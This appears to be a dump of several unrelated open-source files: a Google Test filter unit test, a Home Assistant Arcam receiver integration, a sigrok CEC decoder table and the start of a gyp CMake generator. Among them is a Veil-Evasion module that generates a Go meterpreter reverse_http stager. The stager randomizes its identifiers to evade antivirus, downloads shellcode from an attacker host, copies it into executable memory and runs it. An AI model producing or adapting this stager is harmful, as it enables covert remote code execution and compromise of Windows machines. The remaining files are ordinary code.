RunWithSharding(total_shards, shard_index, command): """Runs a test program shard and returns exit code and a list of tests run.""" extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index), TOTAL_SHARDS_ENV_VAR: str(total_shards)} return InvokeWithModifiedEnv(extra_env, RunAndExtractTestList, command) # The unit test. class GTestFilterUnitTest(gtest_test_utils.TestCase): """Tests the env variable or the command line flag to filter tests.""" # Utilities. def AssertSetEqual(self, lhs, rhs): """Asserts that two sets are equal.""" for elem in lhs: self.assert_(elem in rhs, '%s in %s' % (elem, rhs)) for elem in rhs: self.assert_(elem in lhs, '%s in %s' % (elem, lhs)) def AssertPartitionIsValid(self, set_var, list_of_sets): """Asserts that list_of_sets is a valid partition of set_var.""" full_partition = [] for slice_var in list_of_sets: full_partition.extend(slice_var) self.assertEqual(len(set_var), len(full_partition)) self.assertEqual(sets.Set(set_var), sets.Set(full_partition)) def AdjustForParameterizedTests(self, tests_to_run): """Adjust tests_to_run in case value parameterized tests are disabled.""" global param_tests_present if not param_tests_present: return list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS)) else: return tests_to_run def RunAndVerify(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for a given filter.""" tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # First, tests using the environment variable. # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) tests_run = RunAndExtractTestList()[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, tests_to_run) # pylint: enable-msg=C6403 # Next, tests using the command line flag. if gtest_filter is None: args = [] else: args = ['--%s=%s' % (FILTER_FLAG, gtest_filter)] tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run, args=None, check_exit_0=False): """Checks that binary runs correct tests for the given filter and shard. Runs all shards of gtest_filter_unittest_ with the given filter, and verifies that the right set of tests were run. The union of tests run on each shard should be identical to tests_to_run, without duplicates. Args: gtest_filter: A filter to apply to the tests. total_shards: A total number of shards to split test run into. tests_to_run: A set of tests expected to run. args : Arguments to pass to the to the test binary. check_exit_0: When set to a true value, make sure that all shards return 0. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) partition = [] for i in range(0, total_shards): (tests_run, exit_code) = RunWithSharding(total_shards, i, args) if check_exit_0: self.assertEqual(0, exit_code) partition.append(tests_run) self.AssertPartitionIsValid(tests_to_run, partition) SetEnvVar(FILTER_ENV_VAR, None) # pylint: enable-msg=C6403 def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for the given filter. Runs gtest_filter_unittest_ with the given filter, and enables disabled tests. Verifies that the right set of tests were run. Args: gtest_filter: A filter to apply to the tests. tests_to_run: A set of tests expected to run. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Construct the command line. args = ['--%s' % ALSO_RUN_DISABED_TESTS_FLAG] if gtest_filter is not None: args.append('--%s=%s' % (FILTER_FLAG, gtest_filter)) tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def setUp(self): """Sets up test case. Determines whether value-parameterized tests are enabled in the binary and sets the flags accordingly. """ global param_tests_present if param_tests_present is None: param_tests_present = PARAM_TEST_REGEX.search( RunAndReturnOutput()) is not None def testDefaultBehavior(self): """Tests the behavior of not specifying the filter.""" self.RunAndVerify(None, ACTIVE_TESTS) def testDefaultBehaviorWithShards(self): """Tests the behavior without the filter, with sharding enabled.""" self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS) def testEmptyFilter(self): """Tests an empty filter.""" self.RunAndVerify('', []) self.RunAndVerifyWithSharding('', 1, []) self.RunAndVerifyWithSharding('', 2, []) def testBadFilter(self): """Tests a filter that matches nothing.""" self.RunAndVerify('BadFilter', []) self.RunAndVerifyAllowingDisabled('BadFilter', []) def testFullName(self): """Tests filtering by full name.""" self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz']) def testUniversalFilters(self): """Tests filters that match everything.""" self.RunAndVerify('*', ACTIVE_TESTS) self.RunAndVerify('*.*', ACTIVE_TESTS) self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS) self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS) self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS) def testFilterByTestCase(self): """Tests filtering by test case name.""" self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz']) BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB'] self.RunAndVerify('BazTest.*', BAZ_TESTS) self.RunAndVerifyAllowingDisabled('BazTest.*', BAZ_TESTS + ['BazTest.DISABLED_TestC']) def testFilterByTest(self): """Tests filtering by test name.""" self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne']) def testFilterDisabledTests(self): """Select only the disabled tests to run.""" self.RunAndVerify('DISABLED_FoobarTest.Test1', []) self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1', ['DISABLED_FoobarTest.Test1']) self.RunAndVerify('*DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS) self.RunAndVerify('*.DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.DISABLED_Test2', ]) self.RunAndVerify('DISABLED_*', []) self.RunAndVerifyAllowingDisabled('DISABLED_*', [ 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ]) def testWildcardInTestCaseName(self): """Tests using wildcard in the test case name.""" self.RunAndVerify('*a*.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) def testWildcardInTestName(self): """Tests using wildcard in the test name.""" self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA']) def testFilterWithoutDot(self): """Tests a filter that has no '.' in it.""" self.RunAndVerify('*z*', [ 'FooTest.Xyz', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ]) def testTwoPatterns(self): """Tests filters that consist of two patterns.""" self.RunAndVerify('Foo*.*:*A*', [ 'FooTest.Abc', 'FooTest.Xyz', 'BazTest.TestA', ]) # An empty pattern + a non-empty one self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA']) def testThreePatterns(self): """Tests filters that consist of three patterns.""" self.RunAndVerify('*oo*:*A*:*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', 'BazTest.TestA', ]) # The 2nd pattern is empty. self.RunAndVerify('*oo*::*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', ]) # The last 2 patterns are empty. self.RunAndVerify('*oo*::', [ 'FooTest.Abc', 'FooTest.Xyz', ]) def testNegativeFilters(self): self.RunAndVerify('*-BazTest.TestOne', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('*-FooTest.Abc:BazTest.*', [ 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) self.RunAndVerify('BarTest.*-BarTest.TestOne', [ 'BarTest.TestTwo', 'BarTest.TestThree', ]) # Tests without leading '*'. self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:BazTest.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', ] + DEATH_TESTS + PARAM_TESTS) # Value parameterized tests. self.RunAndVerify('*/*', PARAM_TESTS) # Value parameterized tests filtering by the sequence name. self.RunAndVerify('SeqP/*', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ]) # Value parameterized tests filtering by the test name. self.RunAndVerify('*/0', [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestY/0', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestY/0', ]) def testFlagOverridesEnvVar(self): """Tests that the filter flag overrides the filtering env. variable.""" SetEnvVar(FILTER_ENV_VAR, 'Foo*') args = ['--%s=%s' % (FILTER_FLAG, '*One')] tests_run = RunAndExtractTestList(args)[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne']) def testShardStatusFileIsCreated(self): """Tests that the shard file is created if specified in the environment.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: InvokeWithModifiedEnv(extra_env, RunAndReturnOutput) finally: self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) def testShardStatusFileIsCreatedWithListTests(self): """Tests that the shard file is created with the "list_tests" flag.""" shard_status_file = os.path.join(gtest_test_utils.GetTempDir(), 'shard_status_file2') self.assert_(not os.path.exists(shard_status_file)) extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file} try: output = InvokeWithModifiedEnv(extra_env, RunAndReturnOutput, [LIST_TESTS_FLAG]) finally: # This assertion ensures that Google Test enumerated the tests as # opposed to running them. self.assert_('[==========]' not in output, 'Unexpected output during test enumeration.\n' 'Please ensure that LIST_TESTS_FLAG is assigned the\n' 'correct flag value for listing Google Test tests.') self.assert_(os.path.exists(shard_status_file)) os.remove(shard_status_file) if SUPPORTS_DEATH_TESTS: def testShardingWorksWithDeathTests(self): """Tests integration with death tests and sharding.""" gtest_filter = 'HasDeathTest.*:SeqP/*' expected_tests = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', ] for flag in ['--gtest_death_test_style=threadsafe', '--gtest_death_test_style=fast']: self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests, check_exit_0=True, args=[flag]) self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests, check_exit_0=True, args=[flag]) if __name__ == '__main__': gtest_test_utils.Main()
mit
masterdon/Veil-Evasion
modules/payloads/go/meterpreter/rev_http.py
8
4977
""" Custom-written pure go meterpreter/reverse_http stager. Module built by @b00stfr3ak44 """ from modules.common import helpers from random import randint class Payload: def __init__(self): # required options self.description = "pure windows/meterpreter/reverse_http stager, no shellcode" self.language = "Go" self.extension = "go" self.rating = "Normal" # options we require user ineraction for- format is {Option : [Value, Description]]} self.required_options = { "LHOST" : ["", "IP of the Metasploit handler"], "LPORT" : ["80", "Port of the Metasploit handler"], "COMPILE_TO_EXE" : ["Y", "Compile to an executable"] } def generate(self): memCommit = helpers.randomString() memReserve = helpers.randomString() pageExecRW = helpers.randomString() kernel32 = helpers.randomString() procVirtualAlloc = helpers.randomString() base64Url = helpers.randomString() virtualAlloc = helpers.randomString() size = helpers.randomString() addr = helpers.randomString() err = helpers.randomString() randBase = helpers.randomString() length = helpers.randomString() foo = helpers.randomString() random = helpers.randomString() outp = helpers.randomString() i = helpers.randomString() randTextBase64URL= helpers.randomString() getURI = helpers.randomString() sumVar = helpers.randomString() checksum8 = helpers.randomString() uri = helpers.randomString() value = helpers.randomString() hostAndPort = helpers.randomString() port = self.required_options["LPORT"][0] host = self.required_options["LHOST"][0] response = helpers.randomString() uriLength = randint(5, 255) payload = helpers.randomString() bufferVar = helpers.randomString() x = helpers.randomString() payloadCode = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n" payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n" payloadCode += "const (\n" payloadCode += "%s = 0x1000\n" %(memCommit) payloadCode += "%s = 0x2000\n" %(memReserve) payloadCode += "%s = 0x40\n)\n" %(pageExecRW) payloadCode += "var (\n" payloadCode += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32) payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32) payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url) payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size) payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr) payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo) payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random) payloadCode += "var %s []byte\n" %(outp) payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i) payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo) payloadCode += "return string(%s)\n}\n" %(outp) payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length) payloadCode += "%s := []byte(%s)\n" %(foo, base64Url) payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo) payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length) payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length) payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value) payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri) payloadCode += "func main() {\n" payloadCode += "%s := \"http://%s:%s\"\n" %(hostAndPort, host, port) payloadCode += "%s, _ := http.Get(%s + %s(92, %s))\n" %(response, hostAndPort, getURI, uriLength) payloadCode += "defer %s.Body.Close()\n" %(response) payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response) payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload) payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr) payloadCode += "for %s, %s := range %s {\n" %(x, value, payload) payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value) payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr) return payloadCode
gpl-3.0
home-assistant/home-assistant
homeassistant/components/arcam_fmj/media_player.py
2
11804
"""Arcam media player.""" import logging from arcam.fmj import DecodeMode2CH, DecodeModeMCH, IncomingAudioFormat, SourceCodes from arcam.fmj.state import State from homeassistant import config_entries from homeassistant.components.media_player import BrowseMedia, MediaPlayerEntity from homeassistant.components.media_player.const import ( MEDIA_CLASS_DIRECTORY, MEDIA_CLASS_MUSIC, MEDIA_TYPE_MUSIC, SUPPORT_BROWSE_MEDIA, SUPPORT_PLAY_MEDIA, SUPPORT_SELECT_SOUND_MODE, SUPPORT_SELECT_SOURCE, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP, ) from homeassistant.components.media_player.errors import BrowseError from homeassistant.const import ATTR_ENTITY_ID, STATE_OFF, STATE_ON from homeassistant.core import HomeAssistant, callback from .config_flow import get_entry_client from .const import ( DOMAIN, EVENT_TURN_ON, SIGNAL_CLIENT_DATA, SIGNAL_CLIENT_STARTED, SIGNAL_CLIENT_STOPPED, ) _LOGGER = logging.getLogger(__name__) async def async_setup_entry( hass: HomeAssistant, config_entry: config_entries.ConfigEntry, async_add_entities, ): """Set up the configuration entry.""" client = get_entry_client(hass, config_entry) async_add_entities( [ ArcamFmj( config_entry.title, State(client, zone), config_entry.unique_id or config_entry.entry_id, ) for zone in [1, 2] ], True, ) return True class ArcamFmj(MediaPlayerEntity): """Representation of a media device.""" def __init__( self, device_name, state: State, uuid: str, ): """Initialize device.""" self._state = state self._device_name = device_name self._name = f"{device_name} - Zone: {state.zn}" self._uuid = uuid self._support = ( SUPPORT_SELECT_SOURCE | SUPPORT_PLAY_MEDIA | SUPPORT_BROWSE_MEDIA | SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | SUPPORT_VOLUME_STEP | SUPPORT_TURN_OFF | SUPPORT_TURN_ON ) if state.zn == 1: self._support |= SUPPORT_SELECT_SOUND_MODE def _get_2ch(self): """Return if source is 2 channel or not.""" audio_format, _ = self._state.get_incoming_audio_format() return bool( audio_format in ( IncomingAudioFormat.PCM, IncomingAudioFormat.ANALOGUE_DIRECT, IncomingAudioFormat.UNDETECTED, None, ) ) @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" return self._state.zn == 1 @property def unique_id(self): """Return unique identifier if known.""" return f"{self._uuid}-{self._state.zn}" @property def device_info(self): """Return a device description for device registry.""" return { "name": self._device_name, "identifiers": { (DOMAIN, self._uuid), (DOMAIN, self._state.client.host, self._state.client.port), }, "model": "Arcam FMJ AVR", "manufacturer": "Arcam", } @property def should_poll(self) -> bool: """No need to poll.""" return False @property def name(self): """Return the name of the controlled device.""" return self._name @property def state(self): """Return the state of the device.""" if self._state.get_power(): return STATE_ON return STATE_OFF @property def supported_features(self): """Flag media player features that are supported.""" return self._support async def async_added_to_hass(self): """Once registered, add listener for events.""" await self._state.start() @callback def _data(host): if host == self._state.client.host: self.async_write_ha_state() @callback def _started(host): if host == self._state.client.host: self.async_schedule_update_ha_state(force_refresh=True) @callback def _stopped(host): if host == self._state.client.host: self.async_schedule_update_ha_state(force_refresh=True) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_DATA, _data ) ) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_STARTED, _started ) ) self.async_on_remove( self.hass.helpers.dispatcher.async_dispatcher_connect( SIGNAL_CLIENT_STOPPED, _stopped ) ) async def async_update(self): """Force update of state.""" _LOGGER.debug("Update state %s", self.name) await self._state.update() async def async_mute_volume(self, mute): """Send mute command.""" await self._state.set_mute(mute) self.async_write_ha_state() async def async_select_source(self, source): """Select a specific source.""" try: value = SourceCodes[source] except KeyError: _LOGGER.error("Unsupported source %s", source) return await self._state.set_source(value) self.async_write_ha_state() async def async_select_sound_mode(self, sound_mode): """Select a specific source.""" try: if self._get_2ch(): await self._state.set_decode_mode_2ch(DecodeMode2CH[sound_mode]) else: await self._state.set_decode_mode_mch(DecodeModeMCH[sound_mode]) except KeyError: _LOGGER.error("Unsupported sound_mode %s", sound_mode) return self.async_write_ha_state() async def async_set_volume_level(self, volume): """Set volume level, range 0..1.""" await self._state.set_volume(round(volume * 99.0)) self.async_write_ha_state() async def async_volume_up(self): """Turn volume up for media player.""" await self._state.inc_volume() self.async_write_ha_state() async def async_volume_down(self): """Turn volume up for media player.""" await self._state.dec_volume() self.async_write_ha_state() async def async_turn_on(self): """Turn the media player on.""" if self._state.get_power() is not None: _LOGGER.debug("Turning on device using connection") await self._state.set_power(True) else: _LOGGER.debug("Firing event to turn on device") self.hass.bus.async_fire(EVENT_TURN_ON, {ATTR_ENTITY_ID: self.entity_id}) async def async_turn_off(self): """Turn the media player off.""" await self._state.set_power(False) async def async_browse_media(self, media_content_type=None, media_content_id=None): """Implement the websocket media browsing helper.""" if media_content_id not in (None, "root"): raise BrowseError( f"Media not found: {media_content_type} / {media_content_id}" ) presets = self._state.get_preset_details() radio = [ BrowseMedia( title=preset.name, media_class=MEDIA_CLASS_MUSIC, media_content_id=f"preset:{preset.index}", media_content_type=MEDIA_TYPE_MUSIC, can_play=True, can_expand=False, ) for preset in presets.values() ] root = BrowseMedia( title="Root", media_class=MEDIA_CLASS_DIRECTORY, media_content_id="root", media_content_type="library", can_play=False, can_expand=True, children=radio, ) return root async def async_play_media(self, media_type: str, media_id: str, **kwargs) -> None: """Play media.""" if media_id.startswith("preset:"): preset = int(media_id[7:]) await self._state.set_tuner_preset(preset) else: _LOGGER.error("Media %s is not supported", media_id) return @property def source(self): """Return the current input source.""" value = self._state.get_source() if value is None: return None return value.name @property def source_list(self): """List of available input sources.""" return [x.name for x in self._state.get_source_list()] @property def sound_mode(self): """Name of the current sound mode.""" if self._state.zn != 1: return None if self._get_2ch(): value = self._state.get_decode_mode_2ch() else: value = self._state.get_decode_mode_mch() if value: return value.name return None @property def sound_mode_list(self): """List of available sound modes.""" if self._state.zn != 1: return None if self._get_2ch(): return [x.name for x in DecodeMode2CH] return [x.name for x in DecodeModeMCH] @property def is_volume_muted(self): """Boolean if volume is currently muted.""" value = self._state.get_mute() if value is None: return None return value @property def volume_level(self): """Volume level of device.""" value = self._state.get_volume() if value is None: return None return value / 99.0 @property def media_content_type(self): """Content type of current playing media.""" source = self._state.get_source() if source == SourceCodes.DAB: value = MEDIA_TYPE_MUSIC elif source == SourceCodes.FM: value = MEDIA_TYPE_MUSIC else: value = None return value @property def media_content_id(self): """Content type of current playing media.""" source = self._state.get_source() if source in (SourceCodes.DAB, SourceCodes.FM): preset = self._state.get_tuner_preset() if preset: value = f"preset:{preset}" else: value = None else: value = None return value @property def media_channel(self): """Channel currently playing.""" source = self._state.get_source() if source == SourceCodes.DAB: value = self._state.get_dab_station() elif source == SourceCodes.FM: value = self._state.get_rds_information() else: value = None return value @property def media_artist(self): """Artist of current playing media, music track only.""" source = self._state.get_source() if source == SourceCodes.DAB: value = self._state.get_dls_pdt() else: value = None return value @property def media_title(self): """Title of current playing media.""" source = self._state.get_source() if source is None: return None channel = self.media_channel if channel: value = f"{source.name} - {channel}" else: value = source.name return value
apache-2.0
hufsm/tu_gen2_libsigrokdecode
decoders/cec/protocoldata.py
1
3419
## ## This file is part of the libsigrokdecode project. ## ## Copyright (C) 2018 Jorge Solla Rubiales <jorgesolla@gmail.com> ## ## This program is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## ## This program is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with this program. If not, see <http://www.gnu.org/licenses/>. ## logical_adresses = [ 'TV', 'Recording_1', 'Recording_2', 'Tuner_1', 'Playback_1', 'AudioSystem', 'Tuner2', 'Tuner3', 'Playback_2', 'Recording_3', 'Tuner_4', 'Playback_3', 'Backup_1', 'Backup_2', 'FreeUse', ] # List taken from LibCEC. opcodes = { 0x82: 'ACTIVE_SOURCE', 0x04: 'IMAGE_VIEW_ON', 0x0D: 'TEXT_VIEW_ON', 0x9D: 'INACTIVE_SOURCE', 0x85: 'REQUEST_ACTIVE_SOURCE', 0x80: 'ROUTING_CHANGE', 0x81: 'ROUTING_INFORMATION', 0x86: 'SET_STREAM_PATH', 0x36: 'STANDBY', 0x0B: 'RECORD_OFF', 0x09: 'RECORD_ON', 0x0A: 'RECORD_STATUS', 0x0F: 'RECORD_TV_SCREEN', 0x33: 'CLEAR_ANALOGUE_TIMER', 0x99: 'CLEAR_DIGITAL_TIMER', 0xA1: 'CLEAR_EXTERNAL_TIMER', 0x34: 'SET_ANALOGUE_TIMER', 0x97: 'SET_DIGITAL_TIMER', 0xA2: 'SET_EXTERNAL_TIMER', 0x67: 'SET_TIMER_PROGRAM_TITLE', 0x43: 'TIMER_CLEARED_STATUS', 0x35: 'TIMER_STATUS', 0x9E: 'CEC_VERSION', 0x9F: 'GET_CEC_VERSION', 0x83: 'GIVE_PHYSICAL_ADDRESS', 0x91: 'GET_MENU_LANGUAGE', 0x84: 'REPORT_PHYSICAL_ADDRESS', 0x32: 'SET_MENU_LANGUAGE', 0x42: 'DECK_CONTROL', 0x1B: 'DECK_STATUS', 0x1A: 'GIVE_DECK_STATUS', 0x41: 'PLAY', 0x08: 'GIVE_TUNER_DEVICE_STATUS', 0x92: 'SELECT_ANALOGUE_SERVICE', 0x93: 'SELECT_DIGITAL_SERVICE', 0x07: 'TUNER_DEVICE_STATUS', 0x06: 'TUNER_STEP_DECREMENT', 0x05: 'TUNER_STEP_INCREMENT', 0x87: 'DEVICE_VENDOR_ID', 0x8C: 'GIVE_DEVICE_VENDOR_ID', 0x89: 'VENDOR_COMMAND', 0xA0: 'VENDOR_COMMAND_WITH_ID', 0x8A: 'VENDOR_REMOTE_BUTTON_DOWN', 0x8B: 'VENDOR_REMOTE_BUTTON_UP', 0x64: 'SET_OSD_STRING', 0x46: 'GIVE_OSD_NAME', 0x47: 'SET_OSD_NAME', 0x8D: 'MENU_REQUEST', 0x8E: 'MENU_STATUS', 0x44: 'USER_CONTROL_PRESSED', 0x45: 'USER_CONTROL_RELEASE', 0x8F: 'GIVE_DEVICE_POWER_STATUS', 0x90: 'REPORT_POWER_STATUS', 0x00: 'FEATURE_ABORT', 0xFF: 'ABORT', 0x71: 'GIVE_AUDIO_STATUS', 0x7D: 'GIVE_SYSTEM_AUDIO_MODE_STATUS', 0x7A: 'REPORT_AUDIO_STATUS', 0x72: 'SET_SYSTEM_AUDIO_MODE', 0x70: 'SYSTEM_AUDIO_MODE_REQUEST', 0x7E: 'SYSTEM_AUDIO_MODE_STATUS', 0x9A: 'SET_AUDIO_RATE', } def resolve_logical_address(id, is_initiator): if id < 0 or id > 0x0F: return 'Invalid' # Special handling of 0x0F. if id == 0x0F: return 'Unregistered' if is_initiator else 'Broadcast' return logical_adresses[id] def decode_header(header): src = (header & 0xF0) >> 4 dst = (header & 0x0F) return (resolve_logical_address(src, 1), resolve_logical_address(dst, 0))
gpl-3.0
romero1989/suge-project
node_modules/laravel-elixir/node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/cmake.py
1355
44604
# Copyright (c) 2013 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """cmake output module This module is under development and should be considered experimental. This module produces cmake (2.8.8+) input as its output. One CMakeLists.txt is created for each configuration. This module's original purpose was to support editing in IDEs like KDevelop which use CMake for project management. It is also possible to use CMake to generate projects for other IDEs such as eclipse cdt and code::blocks. QtCreator will convert the CMakeLists.txt to a code::blocks cbp for the editor to read, but build using CMake. As a result QtCreator editor is unaware of compiler defines. The generated CMakeLists.txt can also be used to build on Linux. There is currently no support for building on platforms other than Linux. The generated CMakeLists.txt should properly compile all projects. However, there is a mismatch between gyp and cmake with regard to linking. All attempts are made to work around this, but CMake sometimes sees -Wl,--start-group as a library and incorrectly repeats it. As a result the output of this generator should not be relied on for building. When using with kdevelop, use version 4.4+. Previous versions of kdevelop will not be able to find the header file directories described in the generated CMakeLists.txt file. """ import multiprocessing import os import signal import string import subprocess import gyp.common generator_default_variables = { 'EXECUTABLE_PREFIX': '', 'EXECUTABLE_SUFFIX': '', 'STATIC_LIB_PREFIX': 'lib', 'STATIC_LIB_SUFFIX': '.a', 'SHARED_LIB_PREFIX': 'lib', 'SHARED_LIB_SUFFIX': '.so', 'SHARED_LIB_DIR': '${builddir}/lib.${TOOLSET}', 'LIB_DIR': '${obj}.${TOOLSET}', 'INTERMEDIATE_DIR': '${obj}.${TOOLSET}/${TARGET}/geni', 'SHARED_INTERMEDIATE_DIR': '${obj}/gen', 'PRODUCT_DIR': '${builddir}', 'RULE_INPUT_PATH': '${RULE_INPUT_PATH}', 'RULE_INPUT_DIRNAME': '${RULE_INPUT_DIRNAME}', 'RULE_INPUT_NAME': '${RULE_INPUT_NAME}', 'RULE_INPUT_ROOT': '${RULE_INPUT_ROOT}', 'RULE_INPUT_EXT': '${RULE_INPUT_EXT}', 'CONFIGURATION_NAME': '${configuration}', } FULL_PATH_VARS = ('${CMAKE_CURRENT_LIST_DIR}', '${builddir}', '${obj}') generator_supports_multiple_toolsets = True generator_wants_static_library_dependencies_adjusted = True COMPILABLE_EXTENSIONS = { '.c': 'cc', '.cc': 'cxx', '.cpp': 'cxx', '.cxx': 'cxx', '.s': 's', # cc '.S': 's', # cc } def RemovePrefix(a, prefix): """Returns 'a' without 'prefix' if it starts with 'prefix'.""" return a[len(prefix):] if a.startswith(prefix) else a def CalculateVariables(default_variables, params): """Calculate additional variables for use in the build (called by gyp).""" default_variables.setdefault('OS', gyp.common.GetFlavor(params)) def 